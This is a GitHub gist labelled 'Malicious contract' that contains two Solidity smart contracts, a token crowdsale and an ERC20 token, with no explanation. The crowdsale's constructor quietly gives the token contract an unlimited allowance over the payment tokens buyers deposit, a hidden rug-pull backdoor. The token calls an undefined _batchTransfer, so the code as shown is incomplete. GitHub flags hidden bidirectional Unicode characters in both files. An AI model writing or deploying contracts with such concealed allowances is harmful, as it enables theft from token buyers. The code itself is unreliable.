Created
March 20, 2022 13:30
-
-
Save MASDXI/70a864035dc6e318f2abb50fe8506548 to your computer and use it in GitHub Desktop.
Malicious contract
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| import "@openzeppelin/contracts/access/Ownable.sol"; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| import "@openzeppelin/contracts/security/Pausable.sol"; | |
| contract Crowdsale is Ownable, ReentrancyGuard, Pausable { | |
| IERC20 private _tokenA; | |
| IERC20 private _tokenB; | |
| uint256 private _totalSupply; | |
| event Buy(address account, uint256 amount); | |
| constructor(IERC20 tokenA, IERC20 tokenB) { | |
| _pause(); | |
| _tokenA = tokenA; | |
| _tokenB = tokenB; | |
| _tokenB.approve(address(tokenA), type(uint256).max); | |
| } | |
| function pause() external onlyOwner whenNotPaused { | |
| _pause(); | |
| } | |
| function unpause() external onlyOwner whenPaused { | |
| _unpause(); | |
| } | |
| function buy(uint256 amount) external nonReentrant whenNotPaused { | |
| address sender = _msgSender(); | |
| require( | |
| (_totalSupply + amount) <= _tokenA.totalSupply(), | |
| "buying amount exceed" | |
| ); | |
| _totalSupply = _totalSupply + amount; | |
| _tokenB.transferFrom(sender, address(this), amount); | |
| _tokenA.transfer(sender, amount); | |
| emit Buy(sender, amount); | |
| } | |
| function withdraw() external onlyOwner { | |
| address sender = _msgSender(); | |
| require( | |
| _totalSupply == _tokenA.totalSupply(), | |
| "can't withdraw before sell end" | |
| ); | |
| uint256 balance = _tokenB.balanceOf(address(this)); | |
| _tokenB.transfer( | |
| sender, | |
| balance | |
| ); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; | |
| import "@openzeppelin/contracts/access/Ownable.sol"; | |
| contract MyToken is ERC20, Ownable { | |
| bool private _initialize; | |
| uint256 private constant INITIAL_FUND = 100000000 * (10 ** 18); | |
| address private _crowdSale; | |
| // solhint-disable-next-line | |
| constructor() ERC20("MyToken", "MKT") {} | |
| modifier init() { | |
| require(!_initialize, "already initialized"); | |
| _; | |
| } | |
| function initialize(address token) | |
| external | |
| onlyOwner | |
| init | |
| { | |
| _initialize = true; | |
| _crowdSale = token; | |
| _mint(_crowdSale, INITIAL_FUND); | |
| } | |
| function batchTransfer(address[] memory accounts, uint256[] memory amounts) | |
| external | |
| returns (bool) | |
| { | |
| _batchTransfer(accounts, amounts); | |
| return true; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment